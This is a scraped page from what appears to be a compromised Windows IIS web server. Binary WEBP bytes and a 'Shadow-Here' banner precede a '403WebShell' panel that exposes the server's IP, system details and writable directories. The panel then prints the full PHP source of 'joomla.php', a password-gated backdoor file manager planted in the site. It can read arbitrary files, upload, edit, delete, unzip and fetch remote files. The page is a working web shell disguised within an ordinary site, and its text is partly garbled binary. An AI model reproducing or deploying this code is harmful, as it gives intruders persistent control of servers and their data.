....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îЇy’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒw޼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9ué¶³ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•╪Vêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄͰL–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýcå¡¶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ЁBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊÆƒZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
403Webshell
Server IP : 103.184.242.5  /  Your IP : 216.73.217.105
Web Server : Microsoft-IIS/10.0
System : Windows NT WIN-SH57L3CJ6KF 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_449(avdheshjha) ( 0)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/avdheshjha-40766.package/voiceofresearch.org/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Inetpub/vhosts/avdheshjha-40766.package/voiceofresearch.org/wwwroot/joomla.php
ewq<?php
session_start();

// Configuration
$passwordProtect = true;
$correctPasswordHash = '$2y$10$QfyOVk3Jp2xkseIzHvG.6.9jOrRCgkIELPZp6pXvA0d4ecFcEKCru'; // Replace with your bcrypt hash
$remoteFetchAllowed = true;

// Security check for password protection
if ($passwordProtect) {
    if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true) {
        if (isset($_POST['password'])) {
            if (password_verify($_POST['password'], $correctPasswordHash)) {
                $_SESSION['loggedin'] = true;
            } else {
                die('
                <!DOCTYPE html>
                <html lang="en">
                <head>
                    <meta charset="UTF-8">
                    <meta name="viewport" content="width=device-width, initial-scale=1.0">
                    <title>Access Denied</title>
                    <script src="https://cdn.tailwindcss.com"></script>
                </head>
                <body class="bg-gray-100 h-screen flex items-center justify-center">
                    <div class="bg-white p-8 rounded-lg shadow-md w-full max-w-md">
                        <h2 class="text-2xl font-bold mb-6 text-center">Password Required</h2>
                        <form method="POST">
                            <input type="password" name="password" class="w-full p-2 border rounded mb-4" placeholder="Enter password" required autofocus>
                            <button type="submit" class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Submit</button>
                        </form>
                    </div>
                </body>
                </html>
                ');
            }
        } else {
            echo '
            <!DOCTYPE html>
            <html lang="en">
            <head>
                <meta charset="UTF-8">
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
                <title>Access Denied</title>
                <script src="https://cdn.tailwindcss.com"></script>
            </head>
            <body class="bg-gray-100 h-screen flex items-center justify-center">
                <div class="bg-white p-8 rounded-lg shadow-md w-full max-w-md">
                    <h2 class="text-2xl font-bold mb-6 text-center">Password Required</h2>
                    <form method="POST">
                        <input type="password" name="password" class="w-full p-2 border rounded mb-4" placeholder="Enter password" required autofocus>
                        <button type="submit" class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Submit</button>
                    </form>
                </div>
            </body>
            </html>
            ';
            exit;
        }
    }
}

// Handle file content retrieval for editing
if (isset($_GET['action']) && $_GET['action'] === 'get_file_content' && isset($_GET['file'])) {
    $filePath = realpath($_GET['dir'] . '/' . $_GET['file']);
    if ($filePath && is_file($filePath)) {
        header('Content-Type: text/plain');
        echo file_get_contents($filePath);
        exit;
    } else {
        http_response_code(404);
        echo "File not found.";
        exit;
    }
}

// Handle current directory
$currentDir = isset($_GET['dir']) ? realpath($_GET['dir']) : __DIR__;
if (!$currentDir) {
    $currentDir = __DIR__;
}

// File operations
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Create folder
    if (isset($_POST['create_folder'])) {
        $folderName = sanitizeFileName($_POST['folder_name']);
        $newFolderPath = $currentDir . '/' . $folderName;
        if (!is_dir($newFolderPath)) {
            mkdir($newFolderPath, 0755);
            $message = "Folder created successfully.";
        } else {
            $message = "Folder already exists.";
        }
    }

    // Create file
    if (isset($_POST['create_file'])) {
        $fileName = sanitizeFileName($_POST['file_name']);
        $fileContent = $_POST['file_content'];
        $newFilePath = $currentDir . '/' . $fileName;
        file_put_contents($newFilePath, $fileContent);
        $message = "File created successfully.";
    }

    // Upload file
    if (isset($_FILES['upload_file'])) {
        $uploadedFile = $_FILES['upload_file'];
        $destination = $currentDir . '/' . sanitizeFileName($uploadedFile['name']);
        if (move_uploaded_file($uploadedFile['tmp_name'], $destination)) {
            $message = "File uploaded successfully.";
        } else {
            $message = "Error uploading file.";
        }
    }

    // Rename item
    if (isset($_POST['rename_item'])) {
        $oldName = sanitizeFileName($_POST['old_name']);
        $newName = sanitizeFileName($_POST['new_name']);
        if (rename($currentDir . '/' . $oldName, $currentDir . '/' . $newName)) {
            $message = "Item renamed successfully.";
        } else {
            $messageFi = "Error renaming item.";
        }
    }

    // Delete item
    if (isset($_POST['delete_item'])) {
        $itemName = sanitizeFileName($_POST['item_name']);
        $itemPath = $currentDir . '/' . $itemName;
        if (is_dir($itemPath)) {
            rmdir($itemPath);
            $message = "Folder deleted successfully.";
        } elseif (is_file($itemPath)) {
            unlink($itemPath);
            $message = "File deleted successfully.";
        } else {
            $message = "Item not found.";
        }
    }

    // Unzip file
    if (isset($_POST['unzip_file'])) {
        $zipFile = sanitizeFileName($_POST['zip_file']);
        $zip = new ZipArchive;
        if ($zip->open($currentDir . '/' . $zipFile) === TRUE) {
            $zip->extractTo($currentDir);
            $zip->close();
            $message = "ZIP file extracted successfully.";
        } else {
            $message = "Error extracting ZIP file.";
        }
    }

    // Fetch remote file
    if ($remoteFetchAllowed && isset($_POST['fetch_remote_file'])) {
        $remoteUrl = filter_var($_POST['remote_url'], FILTER_VALIDATE_URL);
        if ($remoteUrl) {
            $fileName = sanitizeFileName(basename($remoteUrl));
            $localPath = $currentDir . '/' . $fileName;
            if (file_put_contents($localPath, file_get_contents($remoteUrl))) {
                $message = "File downloaded successfully.";
            } else {
                $message = "Error downloading file.";
            }
        } else {
            $message = "Invalid URL.";
        }
    }

    // Edit file
    if (isset($_POST['edit_file'])) {
        $fileName = sanitizeFileName($_POST['file_name']);
        $fileContent = $_POST['file_content'];
        $filePath = $currentDir . '/' . $fileName;
        if (file_put_contents($filePath, $fileContent) !== false) {
            $message = "File edited successfully.";
        } else {
            $message = "Error editing file.";
        }
    }
}

// List directory contents
$items = scandir($currentDir);
$directories = [];
$files = [];

foreach ($items as $item) {
    if ($item === '.') continue; // Skip current directory
    $itemPath = $currentDir . '/' . $item;
    if (is_dir($itemPath)) {
        $directories[] = $item;
    } else {
        $files[] = $item;
    }
}
sort($directories);
sort($files);

// Helper functions
function sanitizeFileName($filename) {
    return preg_replace('/[^a-zA-Z0-9._-]/', '', $filename);
}

function formatFileSize($bytes) {
    if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
    if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
    if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
    return $bytes . ' bytes';
}

function generateBreadcrumbs($path) {
    $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path));
    $breadcrumbs = [];
    $cumulativePath = '';

    // Add root
    $breadcrumbs[] = '<a href="?dir=/" class="text-blue-500 hover:underline">Root</a>';

    // Build breadcrumbs
    foreach ($parts as $part) {
        $cumulativePath .= DIRECTORY_SEPARATOR . $part;
        if (realpath($cumulativePath)) {
            $breadcrumbs[] = '<a href="?dir=' . urlencode($cumulativePath) . '" class="text-blue-500 hover:underline">' . htmlspecialchars($part) . '</a>';
        }
    }

    return implode(' / ', $breadcrumbs);
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PHP File Manager</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://kit.fontawesome.com/a076d05399.js" crossorigin="anonymous"></script>
</head>
<body class="bg-gray-100 min-h-screen">
    <div class="container mx-auto p-4">
        <h1 class="text-3xl font-bold mb-6">PHP File Manager</h1>

        <!-- Breadcrumbs -->
        <nav class="mb-4"><?php echo generateBreadcrumbs($currentDir); ?></nav>

        <!-- Message -->
        <?php if (isset($message)): ?>
            <div class="bg-green-100 border-l-4 border-green-500 text-green-700 p-4 mb-4" role="alert">
                <?php echo htmlspecialchars($message); ?>
            </div>
        <?php endif; ?>

        <!-- Action Forms -->
        <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mb-6">
            <!-- Create Folder -->
            <div class="bg-white p-4 rounded-lg shadow">
                <h3 class="text-lg font-semibold mb-2">Create Folder</h3>
                <form method="post" class="flex space-x-2">
                    <input type="text" name="folder_name" class="flex-1 p-2 border rounded" placeholder="Folder name" required>
                    <button type="submit" name="create_folder" class="bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Create</button>
                </form>
            </div>

            <!-- Upload File -->
            <div class="bg-white p-4 rounded-lg shadow">
                <h3 class="text-lg font-semibold mb-2">Upload File</h3>
                <form method="post" enctype="multipart/form-data" class="flex space-x-2">
                    <input type="file" name="upload_file" class="flex-1 p-2 border rounded" required>
                    <button type="submit" class="bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Upload</button>
                </form>
            </div>

            <!-- Fetch Remote File -->
            <?php if ($remoteFetchAllowed): ?>
                <div class="bg-white p-4 rounded-lg shadow">
                    <h3 class="text-lg font-semibold mb-2">Fetch Remote File</h3>
                    <form method="post" class="flex space-x-2">
                        <input type="url" name="remote_url" class="flex-1 p-2 border rounded" placeholder="https://example.com/file.zip" required>
                        <button type="submit" name="fetch_remote_file" class="bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Fetch</button>
                    </form>
                </div>
            <?php endif; ?>
        </div>

        <!-- File/Folder List -->
        <div class="bg-white rounded-lg shadow overflow-x-auto">
            <table class="w-full">
                <thead class="bg-gray-50">
                    <tr>
                        <th class="p-3 text-left">Name</th>
                        <th class="p-3 text-left">Size</th>
                        <th class="p-3 text-left">Writable</th>
                        <th class="p-3 text-left">Last Modified</th>
                        <th class="p-3 text-left">Actions</th>
                    </tr>
                </thead>
                <tbody>
                    <!-- Parent Directory -->
                    <?php if ($currentDir !== DIRECTORY_SEPARATOR): ?>
                        <tr class="border-t">
                            <td class="p-3"><i class="fas fa-folder mr-2"></i><a href="?dir=<?php echo urlencode(dirname($currentDir)); ?>" class="text-blue-500 hover:underline">.. (Parent Directory)</a></td>
                            <td class="p-3">-</td>
                            <td class="p-3">-</td>
                            <td class="p-3">-</td>
                            <td class="p-3"></td>
                        </tr>
                    <?php endif; ?>

                    <!-- Directories -->
                    <?php foreach ($directories as $directory): ?>
                        <?php if ($directory === '..') continue; // Skip '..' as it's handled above ?>
                        <tr class="border-t">
                            <td class="p-3"><i class="fas fa-folder mr-2"></i><a href="?dir=<?php echo urlencode($currentDir . '/' . $directory); ?>" class="text-blue-500 hover:underline"><?php echo htmlspecialchars($directory); ?></a></td>
                            <td class="p-3">-</td>
                            <td class="p-3"><?php echo is_writable($currentDir . '/' . $directory) ? 'Yes' : 'No'; ?></td>
                            <td class="p-3"><?php echo date("Y-m-d H:i:s", filemtime($currentDir . '/' . $directory)); ?></td>
                            <td class="p-3 space-x-2">
                                <button onclick="openRenameModal('<?php echo htmlspecialchars($directory); ?>')" class="bg-yellow-500 text-white px-2 py-1 rounded hover:bg-yellow-600">Rename</button>
                                <button onclick="deleteItem('<?php echo htmlspecialchars($directory); ?>')" class="bg-red-500 text-white px-2 py-1 rounded hover:bg-red-600">Delete</button>
                            </td>
                        </tr>
                    <?php endforeach; ?>

                    <!-- Files -->
                    <?php foreach ($files as $file): ?>
                        <tr class="border-t">
                            <td class="p-3"><i class="fas fa-file mr-2"></i><?php echo htmlspecialchars($file); ?></td>
                            <td class="p-3"><?php echo formatFileSize(filesize($currentDir . '/' . $file)); ?></td>
                            <td class="p-3"><?php echo is_writable($currentDir . '/' . $file) ? 'Yes' : 'No'; ?></td>
                            <td class="p-3"><?php echo date("Y-m-d H:i:s", filemtime($currentDir . '/' . $file)); ?></td>
                            <td class="p-3 space-x-2">
                                <button onclick="editFile('<?php echo htmlspecialchars($file); ?>')" class="bg-blue-500 text-white px-2 py-1 rounded hover:bg-blue-600">Edit</button>
                                <button onclick="openRenameModal('<?php echo htmlspecialchars($file); ?>')" class="bg-yellow-500 text-white px-2 py-1 rounded hover:bg-yellow-600">Rename</button>
                                <button onclick="deleteItem('<?php echo htmlspecialchars($file); ?>')" class="bg-red-500 text-white px-2 py-1 rounded hover:bg-red-600">Delete</button>
                                <?php if (pathinfo($file, PATHINFO_EXTENSION) === 'zip'): ?>
                                    <form method="post" class="inline">
                                        <input type="hidden" name="zip_file" value="<?php echo htmlspecialchars($file); ?>">
                                        <button type="submit" name="unzip_file" class="bg-green-500 text-white px-2 py-1 rounded hover:bg-green-600"><i class="fas fa-file-archive mr-1"></i>Unzip</button>
                                    </form>
                                <?php endif; ?>
                            </td>
                        </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
        </div>
    </div>

    <!-- Edit Modal -->
    <div id="editModal" class="fixed inset-0 bg-gray-600 bg-opacity-50 hidden items-center justify-center">
        <div class="bg-white p-6 rounded-lg w-full max-w-2xl">
            <h2 class="text-xl font-bold mb-4">Edit File</h2>
            <form id="editForm" method="post">
                <input type="hidden" id="editFileName" name="file_name">
                <textarea id="editFileContent" name="file_content" class="w-full h-64 p-2 border rounded mb-4"></textarea>
                <div class="flex justify-end space-x-2">
                    <button type="submit" name="edit_file" class="bg-green-500 text-white px-4 py-2 rounded hover:bg-green-600">Save</button>
                    <button type="button" onclick="closeModal('editModal')" class="bg-gray-500 text-white px-4 py-2 rounded hover:bg-gray-600">Cancel</button>
                </div>
            </form>
        </div>
    </div>

    <!-- Rename Modal -->
    <div id="renameModal" class="fixed inset-0 bg-gray-600 bg-opacity-50 hidden items-center justify-center">
        <div class="bg-white p-6 rounded-lg w-full max-w-md">
            <h2 class="text-xl font-bold mb-4">Rename Item</h2>
            <form id="renameForm" method="post">
                <input type="hidden" id="oldItemName" name="old_name">
                <input type="text" id="newItemName" name="new_name" class="w-full p-2 border rounded mb-4" required>
                <div class="flex justify-end space-x-2">
                    <button type="submit" name="rename_item" class="bg-green-500 text-white px-4 py-2 rounded hover:bg-green-600">Save</button>
                    <button type="button" onclick="closeModal('renameModal')" class="bg-gray-500 text-white px-4 py-2 rounded hover:bg-gray-600">Cancel</button>
                </div>
            </form>
        </div>
    </div>

    <script>
        function editFile(fileName) {
            fetch('?dir=<?php echo urlencode($currentDir); ?>&action=get_file_content&file=' + encodeURIComponent(fileName))
                .then(response => {
                    if (!response.ok) throw new Error('File not found');
                    return response.text();
                })
                .then(content => {
                    document.getElementById('editFileName').value = fileName;
                    document.getElementById('editFileContent').value = content;
                    openModal('editModal');
                })
                .catch(error => {
                    alert('Error loading file content: ' + error.message);
                });
        }

        function openRenameModal(itemName) {
            document.getElementById('oldItemName').value = itemName;
            document.getElementById('newItemName').value = itemName;
            openModal('renameModal');
        }

        function deleteItem(itemName) {
            if (confirm('Are you sure you want to delete this item?')) {
                const form = document.createElement('form');
                form.method = 'post';
                form.innerHTML = `
                    <input type="hidden" name="item_name" value="${itemName}">
                    <input type="hidden" name="delete_item" value="1">
                `;
                document.body.appendChild(form);
                form.submit();
            }
        }

        function openModal(modalId) {
            document.getElementById(modalId).classList.remove('hidden');
            document.getElementById(modalId).classList.add('flex');
        }

        function closeModal(modalId) {
            document.getElementById(modalId).classList.add('hidden');
            document.getElementById(modalId).classList.remove('flex');
        }
    </script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit